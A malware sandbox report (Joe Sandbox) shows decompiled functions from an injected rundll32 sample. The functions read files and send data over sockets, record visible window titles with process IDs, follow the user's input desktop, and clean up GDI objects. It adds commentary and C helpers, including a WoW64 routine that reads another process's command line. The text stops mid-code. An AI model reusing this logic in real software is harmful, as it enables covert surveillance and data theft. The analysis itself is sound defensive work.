                                                            • OpenThread.KERNEL32(001FFFFF,00000000,00000000), ref: 0464C0FC
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0464C10B
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464C10E
                                                            • Sleep.KERNEL32(000003E8), ref: 0464C11E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep$CloseOpen$Handlewsprintf$EventObjectQuerySingleThreadValueWait
                                                            • String ID: Dispatch
                                                            • API String ID: 3560866944-2137261068
                                                            • Opcode ID: a4d586556dc059ccfb901034b39b1ad38883188c2dd9ec1750bbe95af3f964d0
                                                            • Instruction ID: 80aa8190b55a979171f71e5a5936e97db9a4b42ef96b0201134e7f0689a5d3bf
                                                            • Opcode Fuzzy Hash: a4d586556dc059ccfb901034b39b1ad38883188c2dd9ec1750bbe95af3f964d0
                                                            • Instruction Fuzzy Hash: 53F0F071685210A6FB15B7B54C45F3D21298FC8F2CF120329F224A63C0FD917801057A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E046350B0(void* __ecx, LONG* _a4) {
                                                            				signed int _v8;
                                                            				long _v12;
                                                            				long _v16;
                                                            				struct _OVERLAPPED* _v20;
                                                            				long _v24;
                                                            				struct _OVERLAPPED* _v32;
                                                            				WCHAR* _t38;
                                                            				void* _t39;
                                                            				signed int _t41;
                                                            				signed int _t44;
                                                            				long _t45;
                                                            				long _t46;
                                                            				void* _t48;
                                                            				long _t55;
                                                            				signed int _t59;
                                                            				void* _t64;
                                                            				LONG* _t69;
                                                            				void* _t73;
                                                            				LONG* _t74;
                                                            				long _t76;
                                                            				void* _t77;
                                                            
                                                            				_t65 = __ecx;
                                                            				_t74 = _a4;
                                                            				_t73 = __ecx;
                                                            				_v20 = 0;
                                                            				if( *((intOrPtr*)(_t74 + 4)) == 0xffffffff) {
                                                            					L12:
                                                            					E04635220(_t65);
                                                            					__eflags = 0;
                                                            					return 0;
                                                            				} else {
                                                            					_t38 = __ecx + 0x18;
                                                            					if( *((intOrPtr*)(__ecx + 0x2c)) >= 8) {
                                                            						_t38 =  *_t38;
                                                            					}
                                                            					_t39 = CreateFileW(_t38, 0x80000000, 1, 0, 3, 0x80, 0);
                                                            					_t64 = _t39;
                                                            					if(_t64 != 0xffffffff) {
                                                            						_v12 = 0;
                                                            						_t41 = GetFileSize(_t64,  &_v12);
                                                            						_v24 =  *((intOrPtr*)(_t74 + 4));
                                                            						_v8 = 0;
                                                            						_v8 = _v8 | _t41;
                                                            						asm("sbb esi, edx");
                                                            						_t44 = _v8 -  *((intOrPtr*)(_t74 + 4)) + 9;
                                                            						__eflags = _t44;
                                                            						_v8 = _t44;
                                                            						asm("adc esi, 0x0");
                                                            						if(__eflags < 0) {
                                                            							L9:
                                                            							_t76 = _v8;
                                                            						} else {
                                                            							if(__eflags > 0) {
                                                            								L8:
                                                            								_t76 = 0x40000;
                                                            								_v32 = 0;
                                                            							} else {
                                                            								__eflags = _t44 - 0x40000;
                                                            								if(_t44 <= 0x40000) {
                                                            									goto L9;
                                                            								} else {
                                                            									goto L8;
                                                            								}
                                                            							}
                                                            						}
                                                            						_t45 = SetFilePointer(_t64, _v24, _a4, 0);
                                                            						__eflags = _t45 - 0xffffffff;
                                                            						if(_t45 != 0xffffffff) {
                                                            							_t21 = _t76 - 9; // -9
                                                            							_t46 = _t21;
                                                            							_v24 = _t46;
                                                            							__eflags = _t46;
                                                            							if(_t46 == 0) {
                                                            								goto L11;
                                                            							} else {
                                                            								_v16 = 0;
                                                            								_t48 = LocalAlloc(0x40, _t76);
                                                            								_t69 = _a4;
                                                            								_t77 = _t48;
                                                            								 *_t77 = 0x6b;
                                                            								 *(_t77 + 1) =  *_t69;
                                                            								 *(_t77 + 5) = _t69[1];
                                                            								_t30 = _t77 + 9; // 0x9
                                                            								ReadFile(_t64, _t30, _v24,  &_v16, 0);
                                                            								CloseHandle(_t64);
                                                            								_t55 = _v16;
                                                            								__eflags = _t55;
                                                            								if(_t55 == 0) {
                                                            									E04635220(_t73);
                                                            									LocalFree(_t77);
                                                            									return _v20;
                                                            								} else {
                                                            									_push(_t69);
                                                            									_t59 = _t55 + 9;
                                                            									__eflags = _t59;
                                                            									_push(0x4f);
                                                            									_push(_t59);
                                                            									_push(_t77);
                                                            									_v20 = E04631C60( *((intOrPtr*)(_t73 + 4)));
                                                            									LocalFree(_t77);
                                                            									return _v20;
                                                            								}
                                                            							}
                                                            						} else {
                                                            							L11:
                                                            							CloseHandle(_t64);
                                                            							_t65 = _t73;
                                                            							goto L12;
                                                            						}
                                                            					} else {
                                                            						return _t39;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 046350ED
                                                            • GetFileSize.KERNEL32(00000000,?), ref: 04635111
                                                            • SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 04635166
                                                            • CloseHandle.KERNEL32(00000000), ref: 04635172
                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0463519E
                                                            • ReadFile.KERNEL32(00000000,00000009,?,00000000,00000000), ref: 046351C5
                                                            • CloseHandle.KERNEL32(00000000), ref: 046351CC
                                                            • LocalFree.KERNEL32(00000000,00000000,-00000009,0000004F), ref: 046351ED
                                                            • LocalFree.KERNEL32(00000000), ref: 04635207
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Local$CloseFreeHandle$AllocCreatePointerReadSize
                                                            • String ID:
                                                            • API String ID: 1193681933-0
                                                            • Opcode ID: f8c0ec3430a6b3614d1b806e51c0ce07f1b5daba46e78bc43281515e261f80a5
                                                            • Instruction ID: de0aee357e9a91b8f19a5b35d4727e92bd44cf92d601edbf956902b0d9485571
                                                            • Opcode Fuzzy Hash: f8c0ec3430a6b3614d1b806e51c0ce07f1b5daba46e78bc43281515e261f80a5
                                                            • Instruction Fuzzy Hash: FB418775A00205BFDB14DFA5DC44BAEB7B8EF08325F10466AE91AE7380E775AD00CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 80%
                                                            			E0464E540(intOrPtr* __ecx) {
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _t43;
                                                            				long _t44;
                                                            				void* _t50;
                                                            				long _t52;
                                                            				void* _t53;
                                                            				void* _t63;
                                                            				intOrPtr _t66;
                                                            				intOrPtr* _t71;
                                                            				struct _CRITICAL_SECTION* _t76;
                                                            				struct _CRITICAL_SECTION* _t78;
                                                            
                                                            				_push(__ecx);
                                                            				_t71 = __ecx;
                                                            				while( *((intOrPtr*)(_t71 + 0x180)) > 0) {
                                                            					_t2 = _t71 + 0x14c; // 0x14d
                                                            					_t76 = _t2;
                                                            					EnterCriticalSection(_t76);
                                                            					_t63 =  *(_t71 + 0x168);
                                                            					if(_t63 ==  *(_t71 + 0x16c)) {
                                                            						if(_t63 != 0) {
                                                            							 *(_t71 + 0x168) = 0;
                                                            							 *(_t71 + 0x16c) = 0;
                                                            							goto L6;
                                                            						}
                                                            					} else {
                                                            						_t53 =  *(_t63 + 4);
                                                            						 *(_t71 + 0x168) = _t53;
                                                            						 *(_t53 + 8) = 0;
                                                            						L6:
                                                            						if(_t63 != 0) {
                                                            							 *(_t63 + 4) = 0;
                                                            							 *(_t63 + 8) = 0;
                                                            							 *((intOrPtr*)(_t71 + 0x164)) =  *((intOrPtr*)(_t71 + 0x164)) - 1;
                                                            						}
                                                            					}
                                                            					LeaveCriticalSection(_t76);
                                                            					if(_t63 == 0) {
                                                            						break;
                                                            					} else {
                                                            						_t66 =  *((intOrPtr*)(_t63 + 0x14));
                                                            						_t43 =  *((intOrPtr*)(_t63 + 0x18)) - _t66;
                                                            						__imp__#19( *((intOrPtr*)(_t71 + 0x1c)), _t66, _t43, 0);
                                                            						_v24 = _t43;
                                                            						if(_t43 <= 0) {
                                                            							if(_t43 == 0xffffffff) {
                                                            								__imp__#111();
                                                            								if(_t43 != 0x2733) {
                                                            									_t36 = _t71 + 0x84; // 0x85
                                                            									 *((intOrPtr*)(_t71 + 0xc)) = 1;
                                                            									 *((intOrPtr*)(_t71 + 0x10)) = 3;
                                                            									 *((intOrPtr*)(_t71 + 0x14)) = _t43;
                                                            									 *((intOrPtr*)(_t71 + 0x18)) = 1;
                                                            									_t44 = E0464C930(_t36, _t63);
                                                            									if(_t44 == 0) {
                                                            										HeapFree( *( *_t63), _t44, _t63);
                                                            									}
                                                            									return 0;
                                                            								} else {
                                                            									_t25 = _t71 + 0x14c; // 0x14d
                                                            									_t78 = _t25;
                                                            									EnterCriticalSection(_t78);
                                                            									_t50 =  *(_t71 + 0x168);
                                                            									if(_t50 == 0) {
                                                            										 *(_t63 + 8) = 0;
                                                            										 *(_t63 + 4) = 0;
                                                            										 *(_t71 + 0x16c) = _t63;
                                                            									} else {
                                                            										 *(_t50 + 8) = _t63;
                                                            										 *(_t63 + 4) =  *(_t71 + 0x168);
                                                            									}
                                                            									 *((intOrPtr*)(_t71 + 0x164)) =  *((intOrPtr*)(_t71 + 0x164)) + 1;
                                                            									 *(_t71 + 0x168) = _t63;
                                                            									LeaveCriticalSection(_t78);
                                                            									break;
                                                            								}
                                                            							} else {
                                                            								goto L12;
                                                            							}
                                                            						} else {
                                                            							EnterCriticalSection(_t76);
                                                            							 *((intOrPtr*)(_t71 + 0x180)) =  *((intOrPtr*)(_t71 + 0x180)) - _v28;
                                                            							LeaveCriticalSection(_t76);
                                                            							SetLastError(0);
                                                            							 *((intOrPtr*)( *_t71 + 0x84))( *((intOrPtr*)(_t63 + 0x14)), _v28);
                                                            							L12:
                                                            							_t24 = _t71 + 0x84; // 0x85
                                                            							_t52 = E0464C930(_t24, _t63);
                                                            							if(_t52 == 0) {
                                                            								HeapFree( *( *_t63), _t52, _t63);
                                                            							}
                                                            							continue;
                                                            						}
                                                            					}
                                                            					L23:
                                                            				}
                                                            				return 1;
                                                            				goto L23;
                                                            			}

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(0000014D), ref: 0464E564
                                                            • RtlLeaveCriticalSection.NTDLL(0000014D), ref: 0464E5BB
                                                            • send.WS2_32(?,00000000,00000001,00000000), ref: 0464E5D8
                                                            • RtlLeaveCriticalSection.NTDLL(0000014D), ref: 0464E5F9
                                                            • SetLastError.KERNEL32(00000000), ref: 0464E601
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 0464E639
                                                            • WSAGetLastError.WS2_32 ref: 0464E644
                                                            • RtlLeaveCriticalSection.NTDLL(0000014D), ref: 0464E698
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 0464E6D8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$ErrorFreeHeapLast$Entersend
                                                            • String ID:
                                                            • API String ID: 1657114447-0
                                                            • Opcode ID: c0e2e3ccab058869cccefebda6c0441b07fe36be1288c0f711366e14c504234f
                                                            • Instruction ID: 4328777342efe0ab07314fd503a3d5251a15e833d0d18c7a709d25efbd41e780
                                                            • Opcode Fuzzy Hash: c0e2e3ccab058869cccefebda6c0441b07fe36be1288c0f711366e14c504234f
                                                            • Instruction Fuzzy Hash: 48415D71300601EFDB488F65D888BA6FBA8FF55314F008259E919CB250FB76B865CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E046450C0(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, void** _a8) {
                                                            				signed int _v8;
                                                            				short _v2056;
                                                            				void** _v2060;
                                                            				signed int _t18;
                                                            				void** _t20;
                                                            				signed int _t36;
                                                            				struct HWND__* _t44;
                                                            				void* _t50;
                                                            				void* _t51;
                                                            				void* _t52;
                                                            				int _t53;
                                                            				DWORD* _t54;
                                                            				signed int _t56;
                                                            
                                                            				_t52 = __esi;
                                                            				_t18 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t18 ^ _t56;
                                                            				_t20 = _a8;
                                                            				_t44 = _a4;
                                                            				_t50 =  *_t20;
                                                            				_v2060 = _t20;
                                                            				E0465DEA0(_t50,  &_v2056, 0, 0x400);
                                                            				GetWindowTextW(_t44,  &_v2056, 0x3ff);
                                                            				if(IsWindowVisible(_t44) != 0 && lstrlenW( &_v2056) != 0) {
                                                            					if(_t50 == 0) {
                                                            						_t50 = LocalAlloc(0x40, 1);
                                                            					}
                                                            					_push(_t52);
                                                            					_t53 = LocalSize(_t50);
                                                            					_t51 = LocalReAlloc(_t50, 6 + lstrlenW( &_v2056) * 2 + _t53, 0x42);
                                                            					_t54 = _t53 + _t51;
                                                            					GetWindowThreadProcessId(_t44, _t54);
                                                            					_t36 = lstrlenW( &_v2056);
                                                            					_t15 =  &(_t54[1]); // 0x4
                                                            					E0465E060(_t15,  &_v2056, 2 + _t36 * 2);
                                                            					 *_v2060 = _t51;
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t56);
                                                             			}
                                                             Addresses: 0x046450c0, 0x046450c9, 0x046450d0, 0x046450d3, 0x046450d7, 0x046450db, 0x046450e2, 0x046450f1, 0x04645106, 0x04645115, 0x0464512e, 0x0464513a, 0x0464513a, 0x0464513c, 0x04645144, 0x04645166, 0x04645168, 0x0464516c, 0x04645179, 0x0464518e, 0x04645192, 0x046451a0, 0x046451a2, 0x046451b4

                                                            APIs
                                                            • GetWindowTextW.USER32(?,?,000003FF), ref: 04645106
                                                            • IsWindowVisible.USER32(?), ref: 0464510D
                                                            • lstrlenW.KERNEL32(?), ref: 04645122
                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 04645134
                                                            • LocalSize.KERNEL32 ref: 0464513E
                                                            • lstrlenW.KERNEL32(?), ref: 0464514D
                                                            • LocalReAlloc.KERNEL32(?,?,00000042), ref: 04645160
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0464516C
                                                            • lstrlenW.KERNEL32(?,?,?,00000042), ref: 04645179
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LocalWindowlstrlen$Alloc$ProcessSizeTextThreadVisible
                                                            • String ID:
                                                            • API String ID: 925664022-0
                                                            • Opcode ID: 6a006e9c3cd86e99e21b33cbc4994fa21c595587ab9df885d6f0f5c7035646e0
                                                            • Instruction ID: 3b2440b0939c45a303da0bc50da3f32ac3fe199f6fc78dd2e086a79f9fddad04
                                                            • Opcode Fuzzy Hash: 6a006e9c3cd86e99e21b33cbc4994fa21c595587ab9df885d6f0f5c7035646e0
                                                            • Instruction Fuzzy Hash: 8E2171B6540208ABDB10DF65EC4CF9A77FCFB44711F045065FA4AD7140FE39A9488BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
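The callback above emits one packed record per visible, titled window. The parser below is an added example, not code from the sample or from the report: it walks a buffer in that exact format (a 32-bit PID followed by the UTF-16LE title and its terminator, records packed with no padding). `append_record` is a hypothetical builder used only to construct the sample input, and it grows the buffer by the same 6 + 2*len bytes per record that the LocalReAlloc call does. A record that runs off the end of the buffer is reported as truncation rather than silently dropped, which is the case to expect when the list is carved from a memory dump taken while enumeration was still running.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Record layout produced by the callback: a 32-bit owner PID immediately followed by
 * the UTF-16LE window title and its two-byte terminator; records are packed back to
 * back with no padding, so each one is exactly 6 + 2*len bytes (the LocalReAlloc growth). */
typedef struct {
    uint32_t pid;
    uint16_t title[256];   /* UTF-16 code units, NUL-terminated */
    size_t   title_len;    /* code units, excluding the NUL */
} window_record;

static uint32_t rd32le(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static uint16_t rd16le(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Append one record the way the callback does (hypothetical builder, used only to
 * construct sample input; ASCII titles are widened to UTF-16LE). Returns the new length. */
size_t append_record(uint8_t *buf, size_t off, uint32_t pid, const char *ascii_title) {
    for (int i = 0; i < 4; i++) buf[off++] = (uint8_t)(pid >> (8 * i));
    for (const char *c = ascii_title; *c; c++) { buf[off++] = (uint8_t)*c; buf[off++] = 0; }
    buf[off++] = 0; buf[off++] = 0;
    return off;
}

/* Walk a captured buffer. Returns the record count, or -1 when a record runs past the
 * end (a truncated dump, or a start offset that is not on a record boundary). */
int parse_window_list(const uint8_t *buf, size_t len, window_record *out, size_t max_out) {
    size_t off = 0, n = 0;
    while (off < len) {
        window_record r;
        if (len - off < 4 + 2) return -1;           /* PID plus at least a terminator */
        r.pid = rd32le(buf + off);
        off += 4;
        r.title_len = 0;
        for (;;) {
            if (len - off < 2) return -1;           /* title not terminated */
            uint16_t cu = rd16le(buf + off);
            off += 2;
            if (cu == 0) break;
            if (r.title_len < 255) r.title[r.title_len++] = cu;
        }
        r.title[r.title_len] = 0;
        if (n < max_out) out[n] = r;
        n++;
    }
    return (int)n;
}

int main(void) {
    /* Constructed sample list, not data from the sandbox run. */
    uint8_t buf[256];
    size_t len = 0;
    len = append_record(buf, len, 0x1234, "Calculator");
    len = append_record(buf, len, 0x5678, "Untitled - Notepad");
    window_record recs[8];
    int n = parse_window_list(buf, len, recs, 8);
    for (int i = 0; i < n; i++) {
        printf("pid %5u  title \"", recs[i].pid);
        for (size_t j = 0; j < recs[i].title_len; j++)
            putchar(recs[i].title[j] < 0x80 ? (int)recs[i].title[j] : '?');
        puts("\"");
    }
    return n < 0;
}
```

Because the PID field is written with GetWindowThreadProcessId straight into the unaligned position after the previous title, the records carry no length prefix; a consumer can only recover them by scanning for the terminator, which is what the parser does.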

                                                            C-Code - Quality: 95%
                                                             			// Compare the name (UOI_NAME = 2) of the calling thread's desktop with that of the
                                                             			// desktop currently receiving input (OpenInputDesktop with MAXIMUM_ALLOWED = 0x2000000)
                                                             			// and SetThreadDesktop to the input desktop when they differ, so later window and
                                                             			// GDI calls from this thread follow the user across desktop switches.
                                                             			E04645570(void* __ebx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v264;
                                                            				char _v520;
                                                            				long _v524;
                                                            				struct HDESK__* _v528;
                                                            				signed int _t13;
                                                            				struct HDESK__* _t41;
                                                            				void* _t43;
                                                            				signed int _t46;
                                                            
                                                            				_t13 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t13 ^ _t46;
                                                            				_t43 = GetThreadDesktop(GetCurrentThreadId());
                                                            				_v528 = _t43;
                                                            				E0465DEA0(__edi,  &_v264, 0, 0x100);
                                                            				GetUserObjectInformationA(_t43, 2,  &_v264, 0x100,  &_v524);
                                                            				_t41 = OpenInputDesktop(0, 0, 0x2000000);
                                                            				E0465DEA0(_t41,  &_v520, 0, 0x100);
                                                            				GetUserObjectInformationA(_t41, 2,  &_v520, 0x100,  &_v524);
                                                            				if(lstrcmpiA( &_v520,  &_v264) != 0) {
                                                            					SetThreadDesktop(_t41);
                                                            				}
                                                            				CloseDesktop(_v528);
                                                            				CloseDesktop(_t41);
                                                            				return E04655AFE(_v8 ^ _t46);
                                                             			}
                                                             Addresses: 0x04645579, 0x04645580, 0x04645595, 0x046455a5, 0x046455ab, 0x046455cf, 0x046455e5, 0x046455f0, 0x0464560e, 0x04645626, 0x04645629, 0x0464562f, 0x0464563d, 0x04645640, 0x04645654

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 04645588
                                                            • GetThreadDesktop.USER32(00000000), ref: 0464558F
                                                            • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 046455CF
                                                            • OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 046455DA
                                                            • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 0464560E
                                                            • lstrcmpi.KERNEL32(?,?), ref: 0464561E
                                                            • SetThreadDesktop.USER32(00000000), ref: 04645629
                                                            • CloseDesktop.USER32(?), ref: 0464563D
                                                            • CloseDesktop.USER32(00000000), ref: 04645640
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentInputOpenlstrcmpi
                                                            • String ID:
                                                            • API String ID: 3718465862-0
                                                            • Opcode ID: a4086ffc409b9531222739722647a557f2c4fd7939beaf79d4577f762fb9f575
                                                            • Instruction ID: d99b7cd76904fa238be0adf8f99fb6944cf55353230231f9f6200034e8fbaaec
                                                            • Opcode Fuzzy Hash: a4086ffc409b9531222739722647a557f2c4fd7939beaf79d4577f762fb9f575
                                                            • Instruction Fuzzy Hash: 662166B69402187BEB11AB60DC4DFEA777CEB04710F100196FA05E7181EEB46E849F90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                             			// Destructor of an object that owns GDI state: install its vtable, release the
                                                             			// window DC (+0x3c, window handle at +0x104), delete four DCs (+0x40/+0x44/+0x48/+0x78)
                                                             			// and three GDI objects (+0x4c/+0x50/+0x7c), free the heap buffers at +0x14 (if set),
                                                             			// +0x60, +0x5c and +0x64 via L04655B0F, reset the embedded object's vtable at +0x80
                                                             			// and destroy the 16 cursor handles stored from +0xc4 onwards.
                                                             			E046426C0(intOrPtr* __ecx) {
                                                            				int _t29;
                                                            				intOrPtr* _t33;
                                                            				void* _t34;
                                                            				struct HICON__** _t37;
                                                            				void* _t38;
                                                            
                                                            				_t33 = __ecx;
                                                            				 *__ecx = 0x467ecb4;
                                                            				ReleaseDC( *(__ecx + 0x104),  *(__ecx + 0x3c));
                                                            				DeleteDC( *(_t33 + 0x40));
                                                            				DeleteDC( *(_t33 + 0x44));
                                                            				DeleteDC( *(_t33 + 0x48));
                                                            				DeleteDC( *(_t33 + 0x78));
                                                            				DeleteObject( *(_t33 + 0x4c));
                                                            				DeleteObject( *(_t33 + 0x50));
                                                            				DeleteObject( *(_t33 + 0x7c));
                                                            				_t25 =  *((intOrPtr*)(_t33 + 0x14));
                                                            				if( *((intOrPtr*)(_t33 + 0x14)) != 0) {
                                                            					L04655B0F(_t25);
                                                            					_t38 = _t38 + 4;
                                                            				}
                                                            				L04655B0F( *((intOrPtr*)(_t33 + 0x60)));
                                                            				L04655B0F( *((intOrPtr*)(_t33 + 0x5c)));
                                                            				L04655B0F( *((intOrPtr*)(_t33 + 0x64)));
                                                            				_t37 = _t33 + 0xc4;
                                                            				 *((intOrPtr*)(_t33 + 0x80)) = 0x467ec9c;
                                                            				_t34 = 0x10;
                                                            				do {
                                                            					_t29 = DestroyCursor( *_t37);
                                                            					_t37 =  &(_t37[1]);
                                                            					_t34 = _t34 - 1;
                                                            				} while (_t34 != 0);
                                                            				return _t29;
                                                             			}
                                                             Addresses: 0x046426c3, 0x046426c8, 0x046426d4, 0x046426e3, 0x046426e8, 0x046426ed, 0x046426f2, 0x046426fd, 0x04642702, 0x04642707, 0x04642709, 0x0464270e, 0x04642711, 0x04642716, 0x04642716, 0x0464271c, 0x04642724, 0x0464272c, 0x04642737, 0x0464273d, 0x0464274a, 0x04642750, 0x04642752, 0x04642754, 0x04642757, 0x04642757, 0x0464275f

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Delete$Object$CursorDestroyRelease
                                                            • String ID:
                                                            • API String ID: 1665608007-0
                                                            • Opcode ID: 6f71a6a29f398cfe2f180d1fb04043c230477e2e05371b7351254df928966877
                                                            • Instruction ID: 54cb81e0c1caf67fe042eb03aa2527b9c5c6c7f25498dbc268f3e3c0a582ca9b
                                                            • Opcode Fuzzy Hash: 6f71a6a29f398cfe2f180d1fb04043c230477e2e05371b7351254df928966877
                                                            • Instruction Fuzzy Hash: 22113972A00526FBDB266F25DD08985BF66FF00254B000122E91953634EB32BC34EFD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
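The routine E04635D7C decompiled next reads a 64-bit process's command line from the 32-bit (WoW64) side: NtWow64QueryInformationProcess64 fills a 0x30-byte PROCESS_BASIC_INFORMATION64 whose PebBaseAddress sits at offset 8; 0x388 bytes of the 64-bit PEB are read and ProcessParameters is taken from offset 0x20; 0x3f8 bytes of RTL_USER_PROCESS_PARAMETERS64 are read and CommandLine.Length (offset 0x70) and CommandLine.Buffer (offset 0x78) drive the final read; each step is abandoned unless the byte count returned is exactly the byte count requested. The portable C below is an added example, not code from the sample or from the report. It replays those reads against a constructed 64-bit address space: `fake_read` stands in for NtWow64ReadVirtualMemory64, and `build_sample_target` together with the sample addresses and command line are hypothetical, so the offset arithmetic and the strict size checks can be exercised without Windows.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Sizes and offsets the routine hard-codes: the x64 layouts of PROCESS_BASIC_INFORMATION,
 * PEB and RTL_USER_PROCESS_PARAMETERS as seen from a 32-bit caller. */
#define PBI64_SIZE         0x30
#define PBI64_PEB_BASE     0x08   /* PebBaseAddress, ULONG64 */
#define PEB64_READ_SIZE    0x388  /* bytes of the PEB the routine copies */
#define PEB64_PROC_PARAMS  0x20   /* ProcessParameters, ULONG64 */
#define UPP64_READ_SIZE    0x3f8  /* bytes of RTL_USER_PROCESS_PARAMETERS copied */
#define UPP64_CMDLINE_LEN  0x70   /* CommandLine.Length, USHORT, in bytes */
#define UPP64_CMDLINE_BUF  0x78   /* CommandLine.Buffer, ULONG64 */

static uint16_t rd16le(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint64_t rd64le(const uint8_t *p) { uint64_t v = 0; for (int i = 7; i >= 0; i--) v = (v << 8) | p[i]; return v; }
static void wr16le(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr64le(uint8_t *p, uint64_t v) { for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Stand-in for NtWow64ReadVirtualMemory64: 64-bit base, byte count, bytes actually copied. */
typedef size_t (*read64_fn)(void *ctx, uint64_t base, void *dst, size_t size);

typedef struct { uint64_t peb_base, params_base, cmdline_buf; uint16_t cmdline_bytes; } wow64_walk;

/* The three remote reads of the decompiled routine with its "every byte or bail out" checks.
 * pbi is the 0x30-byte PROCESS_BASIC_INFORMATION64 it obtains from NtWow64QueryInformationProcess64.
 * Returns 0 on success, or the step (1..3) whose read came up short. */
int walk_cmdline64(read64_fn rd, void *ctx, const uint8_t *pbi,
                   wow64_walk *w, uint16_t *cmd, size_t cmd_max_units)
{
    uint8_t peb[PEB64_READ_SIZE], upp[UPP64_READ_SIZE], raw[1024];
    w->peb_base = rd64le(pbi + PBI64_PEB_BASE);
    if (rd(ctx, w->peb_base, peb, sizeof peb) != sizeof peb) return 1;
    w->params_base = rd64le(peb + PEB64_PROC_PARAMS);
    if (rd(ctx, w->params_base, upp, sizeof upp) != sizeof upp) return 2;
    w->cmdline_bytes = rd16le(upp + UPP64_CMDLINE_LEN);
    w->cmdline_buf   = rd64le(upp + UPP64_CMDLINE_BUF);
    size_t units = w->cmdline_bytes / 2;          /* the routine allocates (Length/2 + 1) wchars */
    if (w->cmdline_bytes > sizeof raw || units + 1 > cmd_max_units) return 3;
    if (rd(ctx, w->cmdline_buf, raw, w->cmdline_bytes) != w->cmdline_bytes) return 3;
    for (size_t i = 0; i < units; i++) cmd[i] = rd16le(raw + 2 * i);
    cmd[units] = 0;
    return 0;
}

/* Constructed 64-bit address space (hypothetical; not data from the sandbox run). Regions sit
 * above 4 GiB, which is why a 32-bit caller needs the Wow64 64-bit read primitive at all. */
typedef struct { uint64_t base; const uint8_t *data; size_t len; } region;
typedef struct { region r[3]; size_t n; } fake_space;

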